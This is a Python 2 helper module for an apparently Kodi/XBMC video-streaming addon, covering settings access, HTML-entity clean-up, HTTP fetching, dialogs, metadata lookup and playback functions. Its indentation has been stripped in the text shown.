#import c_Extract as extract #extract.all(lib,addonfolder,dp)
#import cHiddenDownloader as downloader #downloader.download(url,destfile,destpath,useResolver=True)
UsedLanguages=ps('UsedLanguages');
### ############################################################################################################
__plugin__=ps('__plugin__'); __authors__=ps('__authors__'); __credits__=ps('__credits__');
### ############################################################################################################
##### Addon / Plugin Basic Setup #####
_addon_id=ps('_addon_id'); _plugin_id=ps('_addon_id');
_addon=Addon(ps('_addon_id'), sys.argv); addon=_addon;
_plugin=xbmcaddon.Addon(id=ps('_addon_id'));
try:
try: import StorageServer as StorageServer
except:
try: import c_StorageServer as StorageServer
except:
try: import storageserverdummy as StorageServer
except:
try: import c_storageserverdummy as StorageServer
except: pass
cache=StorageServer.StorageServer(ps('_addon_id'))
except: pass
##### Paths #####
#_database_name=ps('_database_name')
#_database_file=os.path.join(xbmc.translatePath("special://database"),ps('_database_name')+'.db');
#DB=_database_file;
_domain_url=ps('_domain_url'); _du=ps('_domain_url');
_addonPath =xbmc.translatePath(_plugin.getAddonInfo('path'))
_artPath =xbmc.translatePath(os.path.join(_addonPath,ps('_addon_path_art')))
_datapath =xbmc.translatePath(_addon.get_profile());
_artIcon =_addon.get_icon();
_artFanart =_addon.get_fanart()
##### Important Functions with some dependencies #####
def addstv(id,value=''): _addon.addon.setSetting(id=id,value=value) ## Save Settings
def addst(r,s=''): return _addon.get_setting(r) ## Get Settings
def addpr(r,s=''): return _addon.queries.get(r,s) ## Get Params
def tfalse(r,d=False): ## Get True / False
if (r.lower()=='true' ) or (r.lower()=='t') or (r.lower()=='y') or (r.lower()=='1') or (r.lower()=='yes'): return True
elif (r.lower()=='false') or (r.lower()=='f') or (r.lower()=='n') or (r.lower()=='0') or (r.lower()=='no'): return False
else: return d
def tfalse_old(r,d=False): ## Get True / False
if (r.lower()=='true' ): return True
elif (r.lower()=='false'): return False
else: return d
def art(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,f+fe)) ### for Making path+filename+ext data for Art Images. ###
def artp(f,fe='.png'): return art(f,fe)
def artj(f,fe='.jpg'): return art(f,fe)
def ROart(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,'fr',f+fe)) ### for Making path+filename+ext data for Art Images. ###
def ROartp(f,fe='.png'): return ROart(f,fe)
def ROartj(f,fe='.jpg'): return ROart(f,fe)
def FRart(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,'fr',f+fe)) ### for Making path+filename+ext data for Art Images. ###
def FRartp(f,fe='.png'): return ROart(f,fe)
def FRartj(f,fe='.jpg'): return ROart(f,fe)
##### Settings #####
_setting={};
_setting['enableMeta'] = _enableMeta =tfalse(addst("enableMeta"))
_setting['debug-enable']= _debugging =tfalse(addst("debug-enable"));
_setting['debug-show'] = _shoDebugging =tfalse(addst("debug-show"))
debugging=_debugging
##### Variables #####
_default_section_=ps('default_section');
net=Net();
BASE_URL=ps('_domain_url');
### ############################################################################################################
### ############################################################################################################
def eod(): _addon.end_of_directory()
def notification(header="", message="", sleep=5000 ): xbmc.executebuiltin( "XBMC.Notification(%s,%s,%i)" % ( header, message, sleep ) )
def myNote(header='',msg='',delay=5000,image='http://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/US_99_%281961%29.svg/40px-US_99_%281961%29.svg.png'): _addon.show_small_popup(title=header,msg=msg,delay=delay,image=image)
def cFL( t,c=ps('default_cFL_color')): return '[COLOR '+c+']'+t+'[/COLOR]' ### For Coloring Text ###
def cFL_(t,c=ps('default_cFL_color')): return '[COLOR '+c+']'+t[0:1]+'[/COLOR]'+t[1:] ### For Coloring Text (First Letter-Only) ###
def WhereAmI(t): ### for Writing Location Data to log file ###
if (_debugging==True): print 'Where am I: '+t
def deb(s,t): ### for Writing Debug Data to log file ###
if (_debugging==True): print s+': '+t
def debob(t): ### for Writing Debug Object to log file ###
if (_debugging==True): print t
def nolines(t):
it=t.splitlines(); t=''
for L in it: t=t+L
t=((t.replace("\r","")).replace("\n",""))
return t
def isPath(path): return os.path.exists(path)
def isFile(filename): return os.path.isfile(filename)
def getFileExtension(filename):
ext_pos = filename.rfind('.')
if ext_pos != -1: return filename[ext_pos+1:]
else: return ''
def get_immediate_subdirectories(directory):
return [name for name in os.listdir(directory) if os.path.isdir(os.path.join(directory, name))]
def findInSubdirectory(filename, subdirectory=''):
if subdirectory: path = subdirectory
else: path = _addonPath
for root, _, names in os.walk(path):
if filename in names: return os.path.join(root, filename)
raise 'File not found'
def get_xbmc_os():
try: xbmc_os = os.environ.get('OS')
except: xbmc_os = "unknown"
return xbmc_os
def get_xbmc_version():
rev_re = re.compile('r(\d+)')
try: xbmc_version = xbmc.getInfoLabel('System.BuildVersion')
except: xbmc_version = 'Unknown'
return xbmc_version
def get_xbmc_revision():
rev_re = re.compile('r(\d+)')
try: xbmc_version = xbmc.getInfoLabel('System.BuildVersion')
except: xbmc_version = 'Unknown'
try: xbmc_rev=int(rev_re.search(xbmc_version).group(1)); deb("addoncompat.py: XBMC Revision",xbmc_rev)
except: xbmc_rev=0; deb("addoncompat.py: XBMC Revision not available - Version String",xbmc_version)
return xbmc_rev
def _SaveFile(path,data):
file=open(path,'w')
file.write(data)
file.close()
def _OpenFile(path):
deb('File',path)
if os.path.isfile(path): ## File found.
deb('Found',path)
file = open(path, 'r')
contents=file.read()
file.close()
return contents
else: return '' ## File not found.
def _CreateDirectory(dir_path):
dir_path = dir_path.strip()
if not os.path.exists(dir_path): os.makedirs(dir_path)
def _get_dir(mypath, dirname): #...creates sub-directories if they are not found.
subpath = os.path.join(mypath, dirname)
if not os.path.exists(subpath): os.makedirs(subpath)
return subpath
def askSelection(option_list=[],txtHeader=''):
if (option_list==[]):
debob('askSelection() >> option_list is empty')
return None
dialogSelect = xbmcgui.Dialog();
index=dialogSelect.select(txtHeader, option_list)
return index
def iFL(t): return '[I]'+t+'[/I]' ### For Italic Text ###
def bFL(t): return '[B]'+t+'[/B]' ### For Bold Text ###
def _FL(t,c,e=''): ### For Custom Text Tags ###
if (e==''): d=''
else: d=' '+e
return '['+c.upper()+d+']'+t+'[/'+c.upper()+']'
def aSortMeth(sM,h=int(sys.argv[1])):
xbmcplugin.addSortMethod(handle=h, sortMethod=sM)
def set_view(content='none',view_mode=50,do_sort=False):
deb('content type: ',str(content))
deb('view mode: ',str(view_mode))
h=int(sys.argv[1])
if (content is not 'none'): xbmcplugin.setContent(h, content)
if (tfalse(addst("auto-view"))==True): xbmc.executebuiltin("Container.SetViewMode(%s)" % str(view_mode))
def showkeyboard(txtMessage="",txtHeader="",passwordField=False):
if txtMessage=='None': txtMessage=''
keyboard = xbmc.Keyboard(txtMessage, txtHeader, passwordField)#("text to show","header text", True="password field"/False="show text")
keyboard.doModal()
if keyboard.isConfirmed():
return keyboard.getText()
else:
return False # return ''
def ParseDescription(plot): ## Cleans up the dumb number stuff thats ugly.
if ("&" in plot): plot=plot.replace('&' ,'&')#&#x27;
if (" " in plot): plot=plot.replace(' ' ," ")
if ("’" in plot): plot=plot.replace('’' ,"'")
if ("–" in plot): plot=plot.replace("–","-") #unknown
if addst('my-language',UsedLanguages[1]).lower()==UsedLanguages[1].lower():
#if addst('my-language','French').lower()=='French':
if ('&#' in plot) and (';' in plot):
if ("–" in plot): plot=plot.replace("–","-") #unknown
if ("‘" in plot): plot=plot.replace("‘","'")
if ("’" in plot): plot=plot.replace("’","'")
if ("“" in plot): plot=plot.replace('“','"')
if ("”" in plot): plot=plot.replace('”','"')
if ("×" in plot): plot=plot.replace('×' ,'x')
if ("'" in plot): plot=plot.replace(''' ,"'")
if ("ô" in plot): plot=plot.replace('ô' ,"o")
if ("·" in plot): plot=plot.replace('·' ,"-")
if ("û" in plot): plot=plot.replace('û' ,"u")
if ("à" in plot): plot=plot.replace('à' ,"a")
if ("ƥ" in plot): plot=plot.replace('ƥ',"")
if ("é" in plot): plot=plot.replace('é' ,"e")
if ("â" in plot): plot=plot.replace('â' ,"a")
if ("&" in plot): plot=plot.replace('&' ,"&")
#if ("a" in plot): plot=plot.replace('a' ,"a")
##if (chr(239) in plot): plot=plot.replace(chr(239) ,"'")
#zz=[[u'\xe2','a']] #[[196,'a'],[196,'a'],[196,'a'],[196,'a'],[196,'a']]
#for c1,c2 in zz:
# if (chr(c1) in plot): plot=plot.replace(chr(c1) ,c2)
##plot=plot.replace(chr('0x92'),"'")
if ('&#' in plot) and (';' in plot):
try: matches=re.compile('&#(.+?);').findall(plot)
except: matches=''
if (matches is not ''):
for match in matches:
if (match is not '') and (match is not ' ') and ("&#"+match+";" in plot):
try: plot=plot.replace("&#"+match+";" ,"")
#try: plot=plot.replace("&#"+match+";" ,""+match)
except: pass
try: matches=re.compile('\\x([0-9a-zA-Z][0-9a-zA-Z])').findall(plot)
except: matches=''
#if (matches is not ''):
# for match in matches:
# if (match is not '') and (match is not ' ') and ("\\x"+match+"" in plot):
# try: plot=plot.replace("\\x"+match+"","")
# #try: plot=plot.replace("\\x"+match+"",""+match)
# except: pass
#if ("\xb7" in plot): plot=plot.replace('\xb7' ,"-")
#if ('&#' in plot) and (';' in plot): plot=unescape_(plot)
for i in xrange(127,256):
try: plot=plot.replace(chr(i),"")
except: pass
return plot
def unescape_(s):
p = htmllib.HTMLParser(None)
p.save_bgn()
p.feed(s)
return p.save_end()
def messupText(t,_html=False,_ende=False,_a=False,Slashes=False):
if (_html==True):
try: t=HTMLParser.HTMLParser().unescape(t)
except: pass
try: t=ParseDescription(t)
except: pass
if (_ende==True):
try:
if addst('my-language',UsedLanguages[1]).lower()==UsedLanguages[1].lower():
#if not addst('my-language','French').lower()=='French':
t=t.encode('utf8');
#t=t.encode('utf8','ignore');
#t=t.encode('ascii','ignore');
#t=t.decode('iso-8859-1')
else:
#t=t.encode('utf8','ignore'); t=t.decode('cp1250')
#t=t.encode('utf8'); t=t.decode('cp1250')
#t=t.encode('ascii','ignore'); t=t.decode('iso-8859-1')
#t=unicodedata.normalize('NFKD', unicode(t)).encode('ascii','ignore')
#t=t.encode('ascii','ignore'); t=t.decode('cp1250')
#t=t.encode('ascii','replace'); t=t.decode('cp1250')
#t=t.encode('ascii','strict'); t=t.decode('cp1250')
#t=t.encode('ascii','xmlcharrefreplace'); t=t.decode('cp1250')
#t=t.decode('cp1250')
t=t.encode('utf8');
#t=t.encode('utf8','ignore');
#t=t
except: pass
if (_a==True):
try: t=_addon.decode(t); t=_addon.unescape(t)
except: pass
if (Slashes==True):
try: t=t.replace( '_',' ')
except: pass
#t=t.replace("text:u","")
return t
def nURL(url,method='get',form_data={},headers={},html='',proxy='',User_Agent='',cookie_file='',load_cookie=False,save_cookie=False):
if url=='': return ''
dhtml=''+html
if len(User_Agent) > 0: net.set_user_agent(User_Agent)
else: net.set_user_agent(ps('User-Agent'))
if len(proxy) > 9: net.set_proxy(proxy)
if (len(cookie_file) > 0) and (load_cookie==True): net.set_cookies(cookie_file)
if method.lower()=='get':
try: html=net.http_GET(url,headers=headers).content
except: html=dhtml
elif method.lower()=='post':
try: html=net.http_POST(url,form_data=form_data,headers=headers).content #,compression=False
except: html=dhtml
elif method.lower()=='head':
try: html=net.http_HEAD(url,headers=headers).content
except: html=dhtml
if (len(html) > 0) and (len(cookie_file) > 0) and (save_cookie==True): net.save_cookies(cookie_file)
if 'Website is offline' in html: popOK(msg="Website is offline",title=ps('__plugin__'),line2="Site Web est deconnecte",line3="")
elif 'Erreur de la base de donn' in html: popOK(msg="Error Database",title=ps('__plugin__'),line2="Erreur de la base de donnees",line3="")
return html
def BusyAnimationShow(): xbmc.executebuiltin('ActivateWindow(busydialog)')
def BusyAnimationHide(): xbmc.executebuiltin('Dialog.Close(busydialog,true)')
def closeAllDialogs(): xbmc.executebuiltin('Dialog.Close(all, true)')
def popYN(title='',line1='',line2='',line3='',n='',y=''):
diag=xbmcgui.Dialog()
r=diag.yesno(title,line1,line2,line3,n,y)
if r: return r
else: return False
#del diag
def popOK(msg="",title="",line2="",line3=""):
dialog=xbmcgui.Dialog()
#ok=dialog.ok(title, msg, line2, line3)
dialog.ok(title, msg, line2, line3)
def spAfterSplit(t,ss):
if ss in t: t=t.split(ss)[1]
return t
def spBeforeSplit(t,ss):
if ss in t: t=t.split(ss)[0]
return t
def TP(s): return xbmc.translatePath(s)
def TPap(s,fe='.py'): return xbmc.translatePath(os.path.join(_addonPath,s+fe))
def CopyAFile(tFrom,tTo):
try:
import shutil
shutil.copy(tFrom,tTo)
except: pass
def checkHostProblems(url,b=False,t=True):
if ('embed.yourupload.com/' in url) or ('novamov.com/' in url) or ('veevr.com/' in url): b=t
#if 'embed.yourupload.com/' in url: b=t
#elif 'novamov.com/' in url: b=t
return b
### #Metahandler
#try: from script.module.metahandler import metahandlers
#except: from metahandler import metahandlers
#grab=metahandlers.MetaData(preparezip=False)
#def GRABMETA(name,types):
# type=types
# EnableMeta=tfalse(addst("enableMeta"))
# if (EnableMeta==True):
# if ('movie' in type):
# ### grab.get_meta(media_type, name, imdb_id='', tmdb_id='', year='', overlay=6)
# meta=grab.get_meta('movie',name,'',None,None,overlay=6)
# infoLabels={'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'writer': meta['writer'],'cover_url': meta['cover_url'],'director': meta['director'],'cast': meta['cast'],'backdrop': meta['backdrop_url'],'backdrop_url': meta['backdrop_url'],'tmdb_id': meta['tmdb_id'],'year': meta['year'],'votes': meta['votes'],'tagline': meta['tagline'],'premiered': meta['premiered'],'trailer_url': meta['trailer_url'],'studio': meta['studio'],'imdb_id': meta['imdb_id'],'thumb_url': meta['thumb_url']}
# #infoLabels={'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'writer': meta['writer'],'cover_url': meta['cover_url'],'director': meta['director'],'cast': meta['cast'],'backdrop_url': meta['backdrop_url'],'backdrop_url': meta['backdrop_url'],'tmdb_id': meta['tmdb_id'],'year': meta['year']}
# elif ('tvshow' in type):
# meta=grab.get_meta('tvshow',name,'','',None,overlay=6)
# #print meta
# infoLabels={'rating': meta['rating'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'cover_url': meta['cover_url'],'cast': meta['cast'],'studio': meta['studio'],'banner_url': meta['banner_url'],'backdrop_url': meta['backdrop_url'],'status': meta['status'],'premiered': meta['premiered'],'imdb_id': meta['imdb_id'],'tvdb_id': meta['tvdb_id'],'year': meta['year'],'imgs_prepacked': meta['imgs_prepacked'],'overlay': meta['overlay'],'duration': meta['duration']}
# #infoLabels={'rating': meta['rating'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'cover_url': meta['cover_url'],'cast': meta['cast'],'studio': meta['studio'],'banner_url': meta['banner_url'],'backdrop_url': meta['backdrop_url'],'status': meta['status']}
# else: infoLabels={}
# else: infoLabels={}
# return infoLabels
def MetaGrab(media_type,meta_name,imdb_id='',tmdb_id='',year='',season='',episode=''):
default_infoLabels={'overlay':6,'title':meta_name,'tvdb_id':'','imdb_id':'','cover_url':_artIcon,'poster':_artIcon,'trailer_url':'','trailer':'','TVShowTitle':meta_name,'backdrop_url':_artFanart,'banner_url':''}
try: from metahandler import metahandlers
except: debob("filed to import metahandler"); return default_infoLabels
grab=metahandlers.MetaData(preparezip=False)
try: EnableMeta=tfalse(addst("enableMeta"))
except: EnableMeta=True
if (EnableMeta==True):
if ('movie' in media_type) or (media_type=='m'):
infoLabels=grab.get_meta("movie",meta_name,imdb_id=imdb_id,tmdb_id=tmdb_id,year=year)
elif ('tvshow' in media_type) or (media_type=='t'):
infoLabels=grab.get_meta("tvshow",meta_name,imdb_id=imdb_id)
elif ('episode' in media_type) or (media_type=='e'):
if len(imdb_id)==0:
t_infoLabels=grab.get_meta("tvshow",meta_name,imdb_id=imdb_id)
imdb_id=t_infoLabels['imdb_id']
try:
iseason=int(season)
iepisode=int(episode)
infoLabels=grab.get_episode_meta(tvshowtitle=meta_name,imdb_id=tv_meta['imdb_id'],season=iseason,episode=iepisode)
except: infoLabels={'overlay':6,'title':str(season)+'x'+str(episode),'tvdb_id':'','imdb_id':'','cover_url':_artIcon,'poster':_artIcon,'TVShowTitle':meta_name}
else: infoLabels=default_infoLabels
#
else: infoLabels=default_infoLabels
return infoLabels
#
### ############################################################################################################
class TextBox2: ## Usage Example: TextBox_FromUrl().load('https://raw.github.com/HIGHWAY99/plugin.video.theanimehighway/master/README.md')
WINDOW = 10147; CONTROL_LABEL = 1; CONTROL_TEXTBOX = 5; HEADER_MESSAGE = "%s - ( v%s )" % (__plugin__,addon.get_version()) # set heading
def load_url(self, URL_PATH, HEADER_MESSAGE2=''):
deb('text window from url: ',URL_PATH) #self.URL_PATH
try: text=nURL(URL_PATH)#(self.URL_PATH)
except: text=''
self.load_window(); self.set_header(HEADER_MESSAGE2); self.set_text(text)
def load_file(self, FILE_NAME='changelog.txt', HEADER_MESSAGE2='', FILE_PATH=_addonPath):
txt_path = os.path.join(FILE_PATH,FILE_NAME)
deb('text window from file: ',txt_path)
f = open(txt_path)
text = f.read()
self.load_window(); self.set_header(HEADER_MESSAGE2); self.set_text(text)
def load_string(self, text_string='', HEADER_MESSAGE2=''):
self.load_window(); xbmc.sleep(20); self.set_header(HEADER_MESSAGE2); self.set_text(text_string)
def load_window(self, sleeptime=500):
xbmc.executebuiltin("ActivateWindow(%d)" % ( self.WINDOW, )) # activate the text viewer window
self.win = xbmcgui.Window(self.WINDOW) # get window
xbmc.sleep(sleeptime) # give window time to initialize
def set_header(self, HEADER_MESSAGE2=''):
if (HEADER_MESSAGE2==''): HEADER_MESSAGE2=self.HEADER_MESSAGE
self.win.getControl(self.CONTROL_LABEL).setLabel(HEADER_MESSAGE2)
def set_text(self, text=''):
self.win.getControl(self.CONTROL_TEXTBOX).setText(text)
def RefreshList(): xbmc.executebuiltin("XBMC.Container.Refresh")
def String2TextBox(message='',HeaderMessage=''): TextBox2().load_string(message,HeaderMessage); #RefreshList()
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
##### Player Functions #####
def PlayItCustomL(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
listitem=xbmcgui.ListItem(title,iconImage=img,thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); #PL.add(stream_url,listitem)
#
html=nURL(stream_url); deb('Length of html',str(len(html)));
matches=re.compile('\n+\s*(.*?://.*)\s*\n+').findall(html)
#debob(matches)
if len(matches) > 0:
for match in matches:
#debob(match)
PL.add(match,listitem)
#
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayItCustomL2A(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
listitem=xbmcgui.ListItem(title,iconImage=img,thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); #PL.add(stream_url,listitem)
html=nURL(stream_url); deb('Length of html',str(len(html)));
html=html.replace('#EXT-X-STREAM-INF:PROGRAM-ID=','#EXT-X-STREAM-INF:NAME="'+title+'",PROGRAM-ID=')
PlaylistFile=xbmc.translatePath(os.path.join(_addonPath,'resources','playlist.txt')); debob(PlaylistFile)
_SaveFile(PlaylistFile,html)
PL.add(PlaylistFile,listitem)
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayItCustomMT(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
import proxy; axelhelper=proxy.ProxyHelper()
MultiThread_url=axelhelper.create_proxy_url(stream_url)
###
listitem=xbmcgui.ListItem(thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); PL.add(MultiThread_url,listitem)
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayItCustom(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
listitem=xbmcgui.ListItem(thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); PL.add(stream_url,listitem)
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayURL(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
deb('url',url)
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
play.play(url,li)
except:
try: play.play(url)
except:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
def PlayURL1(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
play.play(url)
except:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
def PlayURLs(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
try: _addon.resolve_url(url)
except: pass
if ':' in url: uPre=url.split(':')[0]
else: uPre='____'
if (uPre.lower()=='mss') or (uPre.lower()=='mssh') or (uPre.lower()=='rtsp'):
_SaveFile(filename,url)
try: play.play(filename) #(url)
except: pass
elif (uPre.lower()=='http'):
import urlresolver
try:
stream_url=urlresolver.HostedMediaFile(url).resolve()
play.play(stream_url)
except:
try: play.play(url)
except: pass
else:
try: play.play(url)
except: pass
#
def PlayURLs2(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
try: _addon.resolve_url(url)
except: pass
if ':' in url: uPre=url.split(':')[0]
else: uPre='____'
if (uPre.lower()=='mss') or (uPre.lower()=='mssh') or (uPre.lower()=='rtsp'):
_SaveFile(filename,url)
try: play.play(filename) #(url)
except: pass
else:
try: play.play(url)
except: pass
def PlayURLstrm(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
_SaveFile(filename,url)
try: _addon.resolve_url(url)
except: t=''
try: play.play(filename) #(url)
except: t=''
def PlayVideo(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#import urlresolver
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
